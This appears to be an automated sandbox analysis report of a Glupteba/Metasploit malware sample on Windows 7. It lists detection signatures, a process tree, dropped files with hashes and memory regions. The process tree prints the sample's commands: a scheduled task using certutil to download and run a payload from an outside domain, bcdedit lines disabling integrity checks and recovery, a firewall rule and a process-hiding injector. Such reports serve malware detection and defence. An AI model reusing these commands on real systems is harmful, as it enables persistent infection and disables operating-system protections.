Analysis

  • max time kernel
    148s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/01/2024, 09:28

General

  • Target

    5f8adc5247685228db6a92ca9f38f667.exe

  • Size

    4.5MB

  • MD5

    5f8adc5247685228db6a92ca9f38f667

  • SHA1

    d02e0de48708042b7d4524be3b1cb1b2c5a63d27

  • SHA256

    1d3b1052852b5248241435db8754373ea350b9d9a6980fa89fb5cc3eb07eb45a

  • SHA512

    e0c9a00d7e2a17d3b3411e44661992320c4c682cbe16dcee64f394656acf9459848b42bb106e49c81fdc30ed19b592c07f6393e98431d6b815cf8bd661a30523

  • SSDEEP

    98304:R6tu0kYaxx1CvLJcAC7eSs16YFa89rPkFZd3lVL:R6t2Y+TAC7eKkr9rMFz3

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 22 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe
    "C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2060
    • C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe
      "C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2856
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1260
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1920
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:992
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:688
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1224
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2444
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1644
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2084
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:964
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2144
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1764
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2796
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2544
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1084
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1228
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:844
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:2952
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2120
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:892
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240116092854.log C:\Windows\Logs\CBS\CbsPersist_20240116092854.cab
    1⤵
    • Drops file in Windows directory
    PID:1580

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

          Filesize

          894KB

          MD5

          7ba4a9ad24fd0bd903324f0cba2ca500

          SHA1

          ad365648b9c3476e54258e7db9ed12d8464bf0f9

          SHA256

          bca123401d301363020d6a0b3b690ec598d25453913edbfefe1587ae839c5d32

          SHA512

          de2dbb868336eab9940b1422ed0c826ac2869ffc0001c626b13dded5c74ee7941a01f5d9e8307a7bc81ce71dcaf4ee5e560d176ef3039b6f4111f15f950a02e0

        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

          Filesize

          395KB

          MD5

          5da3a881ef991e8010deed799f1a5aaf

          SHA1

          fea1acea7ed96d7c9788783781e90a2ea48c1a53

          SHA256

          f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

          SHA512

          24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          90KB

          MD5

          f8e1e983c976b0068af60fbae41ecace

          SHA1

          7b706e53b1c19988d5b6f8526ca53843a00b2b6a

          SHA256

          40c23089e4ee7dd8c0c3722696ae0c555a090ad1e54aead41fd9474845f52bb6

          SHA512

          9b78f5d9b9b80b8eb6205d9cb39d98d7ed7d7b9b3f9d36ffc8394667d9b785f9cbbc65053af6c016817f7b10a528acf37f7a730d1d234a8f316a4eef19990253

        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          44KB

          MD5

          bf24d123c6fe6ab8c5bf88e917b71f67

          SHA1

          b9c506236a8f7afbea7abc99c81db22b84cefbe3

          SHA256

          3749921a4bae4003a127275a6cd9e82dc044a4755832fc7fd45bf1a991f05bd9

          SHA512

          2114db96eff691e15cda76f07324d78470a5f920618631aa044663c21450817e4e087e8a128d59220ceb4a83fef3a21615b3b1255308a0f65f9c1bf32f93f3fb

        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          884863266cf1aadddab6a8d40ea0a5cf

          SHA1

          2b56c255994c757a054a500397c8ce3238006d63

          SHA256

          ba2e3ffeb4710f079a4ad26ad1d387c71373faf1104a951be578e0074c6ab137

          SHA512

          338d15d1fe2449647342d4d9bbea4f840df28a6d9c19329e1f76f1b44a1144d04e1e837204d303286a2c6cdb02422ec81bce7587c7d90e6b04ac4c9331a027a1

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          767924fcab7a4f512186a878d6e53b01

          SHA1

          71873fcf952e5b9420725966d97e24cab38657f4

          SHA256

          52ceecc9954dd985ad6e664c16f0826ee8a57e385e08a92e27189ace25cf755e

          SHA512

          2eb4edd9a4ce501cc008736cf291b983fb9e8f29c61d83a8afdbb93f2ecf1661bfcb99d7b2a3c3f3238138bb8ec472c1d7ae1847c2e5870acc6307f2095a0d67

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          c044a8d4ecd73a077a57e92033826aa7

          SHA1

          7fb07d11a1d679a9cc18558c0069781b048f9174

          SHA256

          cc741b979ab92f7f7dbc30440ef6b2dabbb0d742bdb79d6bdf4ac0d09c78893f

          SHA512

          029b6356abc953a9916e120ccfa4eb3ccd911140b93ffef9442477006c747acf26ab5a6b4695918c021dd5467763c61890d30fe472fb6ef6b027de8dcbe0cffd

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          076fcc711b8e28e0d9a762c778bcd0c4

          SHA1

          a71e5a2871677b5da818c5079a33ade3285cd78d

          SHA256

          4a395ffd3314d569f83462c0876dd0ee30fed45c0edb5a280e05ad186cf180b5

          SHA512

          d670e3425d963590140e1fcec9fba3b9231fc65f3adbef2c381285bf603e86280f9e88c7c5fbbb51691891cd3fa11874da8c52f5785148153190d89379217b91

        • C:\Windows\Temp\Tar5009.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Windows\rss\csrss.exe

          Filesize

          215KB

          MD5

          f09d2cdcdbe7cdc1e725c6a90adc70ac

          SHA1

          9bef72d6a361242bb340f405a7460fa5a1c0fc14

          SHA256

          ebef8f61fcd12ea156cfa445b4e02ba09b51064e5cbe9a95a4fce07876caa596

          SHA512

          8da2f10dff4a23e19cd57ce4a4dae4da431c497543c5ac02264dca5fb9015a5528f2a7332366a05bbf6027dc2fca46afa76590d427e03517f2b46d11d9a7ae58

        • C:\Windows\rss\csrss.exe

          Filesize

          134KB

          MD5

          03f77ca3cd2d7cd45e1b4516cdf297b1

          SHA1

          23214578ffe641d08095a7bc943e9b254020f836

          SHA256

          bf083fe0dc8ed4bd65e2ab7cc75e784032c5e1096114f86aff26a0f110021d84

          SHA512

          7bbdf7380d4b3855129034779c246dded3b9d901b12154a861de68b493ee9b67e339fd34bbe826fab7dd9fe769746719483cee4ae707edbdbce298439479bfef

        • C:\Windows\rss\csrss.exe

          Filesize

          15KB

          MD5

          9f3bd111c10107f3ec04035035562988

          SHA1

          55503c2bc0345ca1d1e23ff7ec3e2339a2882639

          SHA256

          946e45ef4dc4dabb4e1221603d2c974229840b20d3fd702de822715e56c92b12

          SHA512

          5c257eb493ff23193a610ad6188c6661a72e02c533fb040ae1213b7e229cbbc3a4c2e9d65863812ae539a48a42b4d04eb6b31064825c0d56523636d67c99c6a8

        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          281KB

          MD5

          d98e33b66343e7c96158444127a117f6

          SHA1

          bb716c5509a2bf345c6c1152f6e3e1452d39d50d

          SHA256

          5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

          SHA512

          705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          406KB

          MD5

          34930f30b5be3bd8eefed8fe7ad09c7f

          SHA1

          e9695004f134c7d1af233a5a79048d610c5f7379

          SHA256

          7f447f392795a8301c1be1103283c892160f21fdbe09e64728541dd4086e097e

          SHA512

          71ebad4bcf7ad8ed64e3ec0d9fc33fabec78ff09deacb79e62cde5b386db7a3d7a3da09a2be9781502ba801b3eb518fd576123550ec947becf530a0137ba862d

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

          Filesize

          15KB

          MD5

          aef05339187d23af2f408d883461af01

          SHA1

          d4c5d90bbb34c8a7a984716006984ecfa9419902

          SHA256

          c113a1509b935e6508019bfdc70ec65adfb10e452ad61590b09832d6a8d152fe

          SHA512

          0f59de7d4723a22dc15417eaadd41f9248d3b84cc61de2568d220cab6658d32c4c53f199594c686bf8b27c7eaa9252b4f98699ebb744a34341081f4a6c63de76

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          122KB

          MD5

          ed52b4accb4bfad91132c246bda61f20

          SHA1

          bbd5770e198401978a6df444457d4d9957a4d386

          SHA256

          fb5aea678d1d902d731d293897c794ba215cc1bc1934b13b9c77a4c00d409466

          SHA512

          56d217acfaae29dd11d730b87985a1ebb0dd210c5a715cbb1c32d63777ffece82de24abf96a06c1edcbd7f9963f4e4c6b1103314a332a004c0a4c595ddee8de5

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          14KB

          MD5

          2229854319621b6052a5fa7fdf243fbe

          SHA1

          a3dc67a5fc09d204dbc21e637d18f2775d4c8dff

          SHA256

          79a5bc47fe774b141c7e8d72b5e1ba00199bc0eb6a99fb86a529b10e29867e78

          SHA512

          d16743b4a87fc5bc3d09d1b0ce4bf22473d15dda205eac39670ced992114169c46bbed5217c5d8827312d3096e09b6281d1f936c5000e837e6936c001c082027

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          75KB

          MD5

          e9f3a7df4f843bca9f9cb8d853e550b2

          SHA1

          50481e7e45e42766eec1850e9217f0587ab226a8

          SHA256

          691d4605bb32c82fe11790d0b8155d0165630326af8c5084f80cdea630c1afd1

          SHA512

          846159a30999e5b21cdbbb862f76c5ea1d75cc3660b8f1e2b5894e6576d274ea5d3abf2a314cc8873df7f6c2bda84b35c44f437aefadff899e1a08091d0b7c15

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          489KB

          MD5

          326c6698775260256af4a4bde51bef12

          SHA1

          9935fb0c248f4b1441441a60d60b1012c17d7ba1

          SHA256

          3f8b2bd707246c95c38032c611c61c021a4e11cfb604a9396e836e176c55d504

          SHA512

          94e2e8ccbc46506d740021d91d89a63fc568c47b24cce73c3de7f687171ff0345336b5dda975966a5268b02e43d1d084493ec47b9700c36ba813492a743d97fa

        • \Users\Admin\AppData\Local\Temp\symsrv.dll

          Filesize

          59KB

          MD5

          ad01f3fbe7748d25b16dbdebbdf98b2a

          SHA1

          5e9c45fc1c90153b102b988f80b1859dc476a48d

          SHA256

          f3abfa9ee62e62c17c247264eec812cedd6da98eb2c58aa38767f03fd526c348

          SHA512

          d887afa6e53f29ab4210b32f4fc331605c41a14debd6d2c754f37566f2c4f38afc793502996ca77308c8d427c923448de7fc85599a54d74404615e057c4f4123

        • \Windows\rss\csrss.exe

          Filesize

          281KB

          MD5

          e20ed4d84ff2f50280cb53557f5f380f

          SHA1

          beffea89fe45ee55b0fadfbc30d169c6e0a43ac8

          SHA256

          aeab5f0f8f28781d1d127c4c74d04b6296c8c216f56123a9403a756416a597b7

          SHA512

          b97408545cfb2d2d34c28433d1b119a828188da928682b684e23b055f0a5eca8350c4994099d054946f031782fb35a3ea7622c3947b1972154f6021460133af3

        • \Windows\rss\csrss.exe

          Filesize

          222KB

          MD5

          0702e4dae1036aeca11ea6cda0f43983

          SHA1

          f52452a199a5ac99aa20ff0bdae0278885db5238

          SHA256

          40fd64492d67489f1ffb1c8d746c97befc2a386b3735e9a5fc87bf1c2e039a72

          SHA512

          35e38a13cee9f37f74bc5fffcf1696e85c32020e988b113cc91b3c7a5984efeeb777cdc7cf00db2b7c5a1615e67392e7d93ae960d32fcb6916f3e02e4930e4d6

        • memory/1920-239-0x00000000005A0000-0x0000000000B88000-memory.dmp

          Filesize

          5.9MB

        • memory/1920-55-0x00000000007B0000-0x0000000000D98000-memory.dmp

          Filesize

          5.9MB

        • memory/1920-46-0x00000000005A0000-0x0000000000B88000-memory.dmp

          Filesize

          5.9MB

        • memory/1936-237-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-246-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-359-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-358-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-357-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-332-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-331-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-330-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-236-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-22-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-238-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-20-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-240-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-244-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-245-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-329-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-299-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-24-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-0-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-4-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-3-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-2-0x0000000002B20000-0x0000000003446000-memory.dmp

          Filesize

          9.1MB

        • memory/2060-6-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-1-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-7-0x0000000002B20000-0x0000000003446000-memory.dmp

          Filesize

          9.1MB

        • memory/2592-5-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB

        • memory/2592-8-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB

        • memory/2592-9-0x0000000002A40000-0x0000000003366000-memory.dmp

          Filesize

          9.1MB

        • memory/2592-10-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2592-19-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2592-21-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB